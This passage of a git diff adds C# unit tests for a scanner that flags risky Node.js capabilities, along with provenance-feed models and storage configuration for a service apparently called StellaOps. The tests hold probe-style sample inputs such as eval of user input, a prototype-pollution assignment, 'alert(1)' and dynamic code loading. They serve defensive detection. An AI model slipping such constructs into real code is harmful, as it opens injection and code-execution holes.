+ public void ScanFile_DetectsEval()
+ {
+ const string code = @"const result = eval(userInput);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("eval", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNewFunction()
+ {
+ const string code = @"const fn = new Function('a', 'b', 'return a + b');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("new Function", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequireVm()
+ {
+ const string code = @"const vm = require('vm');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("require('vm')", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsVmRunInContext()
+ {
+ const string code = @"vm.runInContext(code, context);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("vm.runInContext", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsVmRunInNewContext()
+ {
+ const string code = @"vm.runInNewContext(code, sandbox);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("vm.runInNewContext", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSetTimeoutWithString()
+ {
+ const string code = @"setTimeout('alert(1)', 1000);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("setTimeout with string", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequireVm2()
+ {
+ const string code = @"const { VM } = require('vm2');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("require('vm2')", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Reflection Patterns
+
+ [Fact]
+ public void ScanFile_DetectsNewProxy()
+ {
+ const string code = @"const proxy = new Proxy(target, handler);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("new Proxy", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsProtoAccess()
+ {
+ const string code = @"obj.__proto__ = malicious;";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("__proto__", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsObjectSetPrototypeOf()
+ {
+ const string code = @"Object.setPrototypeOf(obj, proto);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("Object.setPrototypeOf", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsConstructorAccess()
+ {
+ const string code = @"obj.constructor('return this')();";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal(".constructor()", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Native Code Patterns
+
+ [Fact]
+ public void ScanFile_DetectsRequireNodeAddon()
+ {
+ const string code = @"const addon = require('./build/Release/addon.node');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("require('.node')", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsProcessDlopen()
+ {
+ const string code = @"process.dlopen(module, filename);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("process.dlopen", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequireFfiNapi()
+ {
+ const string code = @"const ffi = require('ffi-napi');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("require('ffi-napi')", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsWebAssemblyInstantiate()
+ {
+ const string code = @"const instance = await WebAssembly.instantiate(wasmBuffer);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("WebAssembly.instantiate", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsWebAssemblyCompile()
+ {
+ const string code = @"const module = await WebAssembly.compile(wasmBuffer);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("WebAssembly.compile", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Other Patterns
+
+ [Fact]
+ public void ScanFile_DetectsRequireWorkerThreads()
+ {
+ const string code = @"const { Worker } = require('worker_threads');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Other, result[0].Kind);
+ Assert.Equal("require('worker_threads')", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsProcessKill()
+ {
+ const string code = @"process.kill(pid, 'SIGTERM');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Other, result[0].Kind);
+ Assert.Equal("process.kill", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsDynamicRequire()
+ {
+ const string code = @"const mod = require(moduleName);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Other, result[0].Kind);
+ Assert.Equal("require(variable)", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequireInspector()
+ {
+ const string code = @"const inspector = require('inspector');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Other, result[0].Kind);
+ Assert.Equal("require('inspector')", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ #endregion
+
+ #region NodeCapabilityEvidence Tests
+
+ [Fact]
+ public void Evidence_DeduplicationKey_IsCorrect()
+ {
+ var evidence = new NodeCapabilityEvidence(
+ CapabilityKind.Exec,
+ "test.js",
+ 10,
+ "child_process.exec");
+
+ Assert.Equal("Exec|test.js|10|child_process.exec", evidence.DeduplicationKey);
+ }
+
+ [Fact]
+ public void Evidence_ConfidenceIsClamped()
+ {
+ var evidence1 = new NodeCapabilityEvidence(
+ CapabilityKind.Exec, "test.js", 1, "pattern",
+ confidence: 2.0f);
+ var evidence2 = new NodeCapabilityEvidence(
+ CapabilityKind.Exec, "test.js", 1, "pattern",
+ confidence: -1.0f);
+
+ Assert.Equal(1.0f, evidence1.Confidence);
+ Assert.Equal(0.0f, evidence2.Confidence);
+ }
+
+ [Fact]
+ public void Evidence_CreateMetadata_IncludesAllFields()
+ {
+ var evidence = new NodeCapabilityEvidence(
+ CapabilityKind.DynamicCode,
+ "test.js",
+ 10,
+ "eval",
+ snippet: "eval(userInput);",
+ confidence: 1.0f,
+ risk: CapabilityRisk.Critical);
+
+ var metadata = evidence.CreateMetadata().ToDictionary(kv => kv.Key, kv => kv.Value);
+
+ Assert.Equal("dynamiccode", metadata["capability.kind"]);
+ Assert.Equal("test.js:10", metadata["capability.source"]);
+ Assert.Equal("eval", metadata["capability.pattern"]);
+ Assert.Equal("critical", metadata["capability.risk"]);
+ Assert.Equal("1.00", metadata["capability.confidence"]);
+ Assert.Contains("eval", metadata["capability.snippet"]);
+ }
+
+ [Fact]
+ public void Evidence_ToLanguageEvidence_ReturnsCorrectFormat()
+ {
+ var evidence = new NodeCapabilityEvidence(
+ CapabilityKind.Exec,
+ "test.js",
+ 10,
+ "child_process.exec");
+
+ var langEvidence = evidence.ToLanguageEvidence();
+
+ Assert.Equal(LanguageEvidenceKind.Metadata, langEvidence.Kind);
+ Assert.Equal("test.js", langEvidence.Source);
+ Assert.Equal("line:10", langEvidence.Locator);
+ Assert.Equal("Exec:child_process.exec", langEvidence.Value);
+ }
+
+ #endregion
+}
diff --git a/src/Signals/StellaOps.Signals/Models/AocProvenance.cs b/src/Signals/StellaOps.Signals/Models/AocProvenance.cs
new file mode 100644
index 000000000..286cf2965
--- /dev/null
+++ b/src/Signals/StellaOps.Signals/Models/AocProvenance.cs
@@ -0,0 +1,343 @@
+using System;
+using System.Collections.Generic;
+using System.Text.Json.Serialization;
+using MongoDB.Bson.Serialization.Attributes;
+
+namespace StellaOps.Signals.Models;
+
+/// <summary>
+/// AOC (Aggregation-Only Contract) provenance feed for runtime facts ingestion (SGSI0101).
+/// Conforms to docs/schemas/provenance-feed.schema.json.
+/// </summary>
+public sealed class ProvenanceFeed
+{
+ public const int CurrentSchemaVersion = 1;
+
+ [BsonElement("schemaVersion")]
+ [JsonPropertyName("schemaVersion")]
+ public int SchemaVersion { get; init; } = CurrentSchemaVersion;
+
+ [BsonElement("feedId")]
+ [JsonPropertyName("feedId")]
+ public string FeedId { get; init; } = Guid.NewGuid().ToString("D");
+
+ [BsonElement("feedType")]
+ [JsonPropertyName("feedType")]
+ public ProvenanceFeedType FeedType { get; init; } = ProvenanceFeedType.RuntimeFacts;
+
+ [BsonElement("generatedAt")]
+ [JsonPropertyName("generatedAt")]
+ public DateTimeOffset GeneratedAt { get; init; } = DateTimeOffset.UtcNow;
+
+ [BsonElement("sourceService")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("sourceService")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? SourceService { get; init; }
+
+ [BsonElement("tenantId")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("tenantId")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? TenantId { get; init; }
+
+ [BsonElement("correlationId")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("correlationId")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? CorrelationId { get; init; }
+
+ [BsonElement("records")]
+ [JsonPropertyName("records")]
+ public List<ProvenanceRecord> Records { get; init; } = new();
+
+ [BsonElement("metadata")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("metadata")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public Dictionary? Metadata { get; init; }
+
+ [BsonElement("attestation")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("attestation")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public FeedAttestation? Attestation { get; init; }
+}
+
+[JsonConverter(typeof(JsonStringEnumConverter))]
+public enum ProvenanceFeedType
+{
+ [JsonPropertyName("RUNTIME_FACTS")]
+ RuntimeFacts,
+
+ [JsonPropertyName("SIGNAL_ENRICHMENT")]
+ SignalEnrichment,
+
+ [JsonPropertyName("CAS_PROMOTION")]
+ CasPromotion,
+
+ [JsonPropertyName("SCORING_OUTPUT")]
+ ScoringOutput,
+
+ [JsonPropertyName("AUTHORITY_SCOPES")]
+ AuthorityScopes
+}
+
+/// <summary>
+/// Individual provenance record within a feed.
+/// </summary>
+public sealed class ProvenanceRecord
+{
+ [BsonElement("recordId")]
+ [JsonPropertyName("recordId")]
+ public string RecordId { get; init; } = Guid.NewGuid().ToString("D");
+
+ [BsonElement("recordType")]
+ [JsonPropertyName("recordType")]
+ public string RecordType { get; init; } = string.Empty;
+
+ [BsonElement("subject")]
+ [JsonPropertyName("subject")]
+ public ProvenanceSubject Subject { get; init; } = new();
+
+ [BsonElement("occurredAt")]
+ [JsonPropertyName("occurredAt")]
+ public DateTimeOffset OccurredAt { get; init; }
+
+ [BsonElement("observedBy")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("observedBy")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? ObservedBy { get; init; }
+
+ [BsonElement("confidence")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("confidence")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public double? Confidence { get; init; }
+
+ [BsonElement("facts")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("facts")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public RuntimeProvenanceFacts? Facts { get; init; }
+
+ [BsonElement("evidence")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("evidence")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public RecordEvidence? Evidence { get; init; }
+}
+
+/// <summary>
+/// Subject of a provenance record.
+/// </summary>
+public sealed class ProvenanceSubject
+{
+ [BsonElement("type")]
+ [JsonPropertyName("type")]
+ public ProvenanceSubjectType Type { get; init; } = ProvenanceSubjectType.Package;
+
+ [BsonElement("identifier")]
+ [JsonPropertyName("identifier")]
+ public string Identifier { get; init; } = string.Empty;
+
+ [BsonElement("digest")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("digest")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? Digest { get; init; }
+
+ [BsonElement("namespace")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("namespace")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? Namespace { get; init; }
+}
+
+[JsonConverter(typeof(JsonStringEnumConverter))]
+public enum ProvenanceSubjectType
+{
+ [JsonPropertyName("CONTAINER")]
+ Container,
+
+ [JsonPropertyName("PROCESS")]
+ Process,
+
+ [JsonPropertyName("PACKAGE")]
+ Package,
+
+ [JsonPropertyName("FILE")]
+ File,
+
+ [JsonPropertyName("NETWORK")]
+ Network,
+
+ [JsonPropertyName("IMAGE")]
+ Image
+}
+
+/// <summary>
+/// Runtime-specific provenance facts.
+/// </summary>
+public sealed class RuntimeProvenanceFacts
+{
+ [BsonElement("symbolId")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("symbolId")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? SymbolId { get; init; }
+
+ [BsonElement("processName")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("processName")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? ProcessName { get; init; }
+
+ [BsonElement("processId")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("processId")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public int? ProcessId { get; init; }
+
+ [BsonElement("socketAddress")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("socketAddress")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? SocketAddress { get; init; }
+
+ [BsonElement("containerId")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("containerId")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? ContainerId { get; init; }
+
+ [BsonElement("hitCount")]
+ [JsonPropertyName("hitCount")]
+ public int HitCount { get; init; }
+
+ [BsonElement("purl")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("purl")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? Purl { get; init; }
+
+ [BsonElement("codeId")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("codeId")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? CodeId { get; init; }
+
+ [BsonElement("buildId")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("buildId")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? BuildId { get; init; }
+
+ [BsonElement("loaderBase")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("loaderBase")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? LoaderBase { get; init; }
+
+ [BsonElement("metadata")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("metadata")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public Dictionary? Metadata { get; init; }
+}
+
+/// <summary>
+/// Evidence supporting a provenance record.
+/// </summary>
+public sealed class RecordEvidence
+{
+ [BsonElement("sourceDigest")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("sourceDigest")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? SourceDigest { get; init; }
+
+ [BsonElement("captureMethod")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("captureMethod")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public EvidenceCaptureMethod? CaptureMethod { get; init; }
+
+ [BsonElement("rawDataRef")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("rawDataRef")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? RawDataRef { get; init; }
+}
+
+[JsonConverter(typeof(JsonStringEnumConverter))]
+public enum EvidenceCaptureMethod
+{
+ [JsonPropertyName("eBPF")]
+ EBpf,
+
+ [JsonPropertyName("PROC_SCAN")]
+ ProcScan,
+
+ [JsonPropertyName("API_CALL")]
+ ApiCall,
+
+ [JsonPropertyName("LOG_ANALYSIS")]
+ LogAnalysis,
+
+ [JsonPropertyName("STATIC_ANALYSIS")]
+ StaticAnalysis
+}
+
+/// <summary>
+/// Attestation metadata for a provenance feed.
+/// </summary>
+public sealed class FeedAttestation
+{
+ [BsonElement("predicateType")]
+ [JsonPropertyName("predicateType")]
+ public string PredicateType { get; init; } = "https://stella.ops/attestation/provenance-feed/v1";
+
+ [BsonElement("signedAt")]
+ [JsonPropertyName("signedAt")]
+ public DateTimeOffset SignedAt { get; init; }
+
+ [BsonElement("keyId")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("keyId")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? KeyId { get; init; }
+
+ [BsonElement("envelopeDigest")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("envelopeDigest")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? EnvelopeDigest { get; init; }
+
+ [BsonElement("transparencyLog")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("transparencyLog")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public string? TransparencyLog { get; init; }
+}
+
+/// <summary>
+/// Context facts container stored on ReachabilityFactDocument.
+/// </summary>
+public sealed class ContextFacts
+{
+ [BsonElement("provenance")]
+ [BsonIgnoreIfNull]
+ [JsonPropertyName("provenance")]
+ [JsonIgnore(Condition = JsonIgnoreCondition.WhenWritingNull)]
+ public ProvenanceFeed? Provenance { get; set; }
+
+ [BsonElement("lastUpdatedAt")]
+ [JsonPropertyName("lastUpdatedAt")]
+ public DateTimeOffset LastUpdatedAt { get; set; }
+
+ [BsonElement("recordCount")]
+ [JsonPropertyName("recordCount")]
+ public int RecordCount { get; set; }
+}
diff --git a/src/Signals/StellaOps.Signals/Models/ReachabilityFactDocument.cs b/src/Signals/StellaOps.Signals/Models/ReachabilityFactDocument.cs
index 5642ef398..ef2fad8c4 100644
--- a/src/Signals/StellaOps.Signals/Models/ReachabilityFactDocument.cs
+++ b/src/Signals/StellaOps.Signals/Models/ReachabilityFactDocument.cs
@@ -31,6 +31,10 @@ public sealed class ReachabilityFactDocument
[BsonIgnoreIfNull]
public Dictionary? Metadata { get; set; }
+ [BsonElement("contextFacts")]
+ [BsonIgnoreIfNull]
+ public ContextFacts? ContextFacts { get; set; }
+
[BsonElement("score")]
public double Score { get; set; }
diff --git a/src/Signals/StellaOps.Signals/Options/SignalsArtifactStorageOptions.cs b/src/Signals/StellaOps.Signals/Options/SignalsArtifactStorageOptions.cs
index d27bc0096..5b6ee3e98 100644
--- a/src/Signals/StellaOps.Signals/Options/SignalsArtifactStorageOptions.cs
+++ b/src/Signals/StellaOps.Signals/Options/SignalsArtifactStorageOptions.cs
@@ -1,4 +1,5 @@
using System;
+using System.Collections.Generic;
using System.IO;
namespace StellaOps.Signals.Options;
@@ -9,18 +10,144 @@ namespace StellaOps.Signals.Options;
public sealed class SignalsArtifactStorageOptions
{
///
- /// Root directory used to persist raw callgraph artifacts.
+ /// Storage driver: "filesystem" (default) or "rustfs".
+ ///
+ public string Driver { get; set; } = SignalsStorageDrivers.FileSystem;
+
+ ///
+ /// Root directory used to persist raw callgraph artifacts (filesystem driver).
///
public string RootPath { get; set; } = Path.Combine(AppContext.BaseDirectory, "callgraph-artifacts");
+ ///
+ /// Bucket name for CAS storage (RustFS driver).
+ /// Per CAS contract, signals uses "signals-data" bucket.
+ ///
+ public string BucketName { get; set; } = "signals-data";
+
+ ///
+ /// Root prefix within the bucket for callgraph artifacts.
+ ///
+ public string RootPrefix { get; set; } = "callgraphs";
+
+ ///
+ /// RustFS-specific options.
+ ///
+ public SignalsRustFsOptions RustFs { get; set; } = new();
+
+ ///
+ /// Additional headers to include in storage requests.
+ ///
+ public IDictionary<string, string> Headers { get; } = new Dictionary<string, string>(StringComparer.OrdinalIgnoreCase);
+
+ ///
+ /// Returns true if the filesystem driver is configured.
+ ///
+ public bool IsFileSystemDriver()
+ => string.Equals(Driver, SignalsStorageDrivers.FileSystem, StringComparison.OrdinalIgnoreCase);
+
+ ///
+ /// Returns true if the RustFS driver is configured.
+ ///
+ public bool IsRustFsDriver()
+ => string.Equals(Driver, SignalsStorageDrivers.RustFs, StringComparison.OrdinalIgnoreCase);
+
///
/// Validates the configured values.
///
public void Validate()
{
- if (string.IsNullOrWhiteSpace(RootPath))
+ if (!IsFileSystemDriver() && !IsRustFsDriver())
{
- throw new InvalidOperationException("Signals artifact storage path must be configured.");
+ throw new InvalidOperationException($"Signals storage driver '{Driver}' is not supported. Use '{SignalsStorageDrivers.FileSystem}' or '{SignalsStorageDrivers.RustFs}'.");
+ }
+
+ if (IsFileSystemDriver() && string.IsNullOrWhiteSpace(RootPath))
+ {
+ throw new InvalidOperationException("Signals artifact storage path must be configured for filesystem driver.");
+ }
+
+ if (IsRustFsDriver())
+ {
+ RustFs ??= new SignalsRustFsOptions();
+ RustFs.Validate();
+
+ if (string.IsNullOrWhiteSpace(BucketName))
+ {
+ throw new InvalidOperationException("Signals storage bucket name must be configured for RustFS driver.");
+ }
}
}
}
+
+///
+/// RustFS-specific configuration options.
+///
+public sealed class SignalsRustFsOptions
+{
+ ///
+ /// Base URL for the RustFS service (e.g., http://localhost:8180/api/v1).
+ ///
+ public string BaseUrl { get; set; } = string.Empty;
+
+ ///
+ /// Allow insecure TLS connections (development only).
+ ///
+ public bool AllowInsecureTls { get; set; }
+
+ ///
+ /// API key for authentication.
+ ///
+ public string? ApiKey { get; set; }
+
+ ///
+ /// Header name for the API key (e.g., "X-API-Key").
+ ///
+ public string ApiKeyHeader { get; set; } = "X-API-Key";
+
+ ///
+ /// HTTP request timeout.
+ ///
+ public TimeSpan Timeout { get; set; } = TimeSpan.FromSeconds(60);
+
+ ///
+ /// Validates the configured values.
+ ///
+ public void Validate()
+ {
+ if (string.IsNullOrWhiteSpace(BaseUrl))
+ {
+ throw new InvalidOperationException("RustFS baseUrl must be configured.");
+ }
+
+ if (!Uri.TryCreate(BaseUrl, UriKind.Absolute, out var uri))
+ {
+ throw new InvalidOperationException("RustFS baseUrl must be an absolute URI.");
+ }
+
+ if (!string.Equals(uri.Scheme, Uri.UriSchemeHttp, StringComparison.OrdinalIgnoreCase)
+ && !string.Equals(uri.Scheme, Uri.UriSchemeHttps, StringComparison.OrdinalIgnoreCase))
+ {
+ throw new InvalidOperationException("RustFS baseUrl must use HTTP or HTTPS.");
+ }
+
+ if (Timeout <= TimeSpan.Zero)
+ {
+ throw new InvalidOperationException("RustFS timeout must be greater than zero.");
+ }
+
+ if (!string.IsNullOrWhiteSpace(ApiKeyHeader) && string.IsNullOrWhiteSpace(ApiKey))
+ {
+ throw new InvalidOperationException("RustFS API key header name requires a non-empty API key.");
+ }
+ }
+}
+
+///
+/// Supported storage driver names.
+///
+public static class SignalsStorageDrivers
+{
+ public const string FileSystem = "filesystem";
+ public const string RustFs = "rustfs";
+}
diff --git a/src/Signals/StellaOps.Signals/Program.cs b/src/Signals/StellaOps.Signals/Program.cs
index 7de62882f..fc7f6e0be 100644
--- a/src/Signals/StellaOps.Signals/Program.cs
+++ b/src/Signals/StellaOps.Signals/Program.cs
@@ -1,7 +1,8 @@
-using System.IO;
-using System.Threading.Tasks;
-using Microsoft.AspNetCore.Authentication;
-using Microsoft.AspNetCore.Mvc;
+using System.IO;
+using System.Net.Http;
+using System.Threading.Tasks;
+using Microsoft.AspNetCore.Authentication;
+using Microsoft.AspNetCore.Mvc;
using Microsoft.Extensions.Options;
using MongoDB.Driver;
using NetEscapades.Configuration.Yaml;
@@ -9,16 +10,16 @@ using StellaOps.Auth.Abstractions;
using StellaOps.Auth.ServerIntegration;
using StellaOps.Configuration;
using StellaOps.Signals.Authentication;
-using StellaOps.Signals.Hosting;
-using StellaOps.Signals.Models;
-using StellaOps.Signals.Options;
-using StellaOps.Signals.Parsing;
-using StellaOps.Signals.Persistence;
-using StellaOps.Signals.Routing;
-using StellaOps.Signals.Services;
-using StellaOps.Signals.Storage;
-
-var builder = WebApplication.CreateBuilder(args);
+using StellaOps.Signals.Hosting;
+using StellaOps.Signals.Models;
+using StellaOps.Signals.Options;
+using StellaOps.Signals.Parsing;
+using StellaOps.Signals.Persistence;
+using StellaOps.Signals.Routing;
+using StellaOps.Signals.Services;
+using StellaOps.Signals.Storage;
+
+var builder = WebApplication.CreateBuilder(args);
builder.Configuration.AddStellaOpsDefaults(options =>
{
@@ -74,10 +75,10 @@ builder.Services.AddOptions()
.ValidateOnStart();
builder.Services.AddSingleton(sp => sp.GetRequiredService>().Value);
-builder.Services.AddSingleton();
-builder.Services.AddSingleton(TimeProvider.System);
-builder.Services.AddSingleton();
-builder.Services.AddProblemDetails();
+builder.Services.AddSingleton();
+builder.Services.AddSingleton(TimeProvider.System);
+builder.Services.AddSingleton();
+builder.Services.AddProblemDetails();
builder.Services.AddHealthChecks();
builder.Services.AddRouting(options => options.LowercaseUrls = true);
@@ -96,59 +97,87 @@ builder.Services.AddSingleton(sp =>
return mongoClient.GetDatabase(databaseName);
});
-builder.Services.AddSingleton>(sp =>
-{
- var opts = sp.GetRequiredService>().Value;
- var database = sp.GetRequiredService();
- var collection = database.GetCollection(opts.Mongo.CallgraphsCollection);
- EnsureCallgraphIndexes(collection);
- return collection;
-});
-
-builder.Services.AddSingleton>(sp =>
-{
- var opts = sp.GetRequiredService>().Value;
- var database = sp.GetRequiredService();
- var collection = database.GetCollection(opts.Mongo.ReachabilityFactsCollection);
- EnsureReachabilityFactIndexes(collection);
- return collection;
-});
-
-builder.Services.AddSingleton>(sp =>
-{
- var opts = sp.GetRequiredService>().Value;
- var database = sp.GetRequiredService();
- var collection = database.GetCollection(opts.Mongo.UnknownsCollection);
- EnsureUnknownsIndexes(collection);
- return collection;
-});
-
-builder.Services.AddSingleton();
-builder.Services.AddSingleton();
-builder.Services.AddSingleton(new SimpleJsonCallgraphParser("java"));
-builder.Services.AddSingleton(new SimpleJsonCallgraphParser("nodejs"));
-builder.Services.AddSingleton(new SimpleJsonCallgraphParser("python"));
-builder.Services.AddSingleton(new SimpleJsonCallgraphParser("go"));
-builder.Services.AddSingleton();
-builder.Services.AddSingleton();
-builder.Services.AddSingleton();
-builder.Services.AddSingleton(sp =>
-{
- var options = sp.GetRequiredService>().Value;
- return new RedisReachabilityCache(options.Cache);
-});
-builder.Services.AddSingleton();
-builder.Services.AddSingleton(sp =>
-{
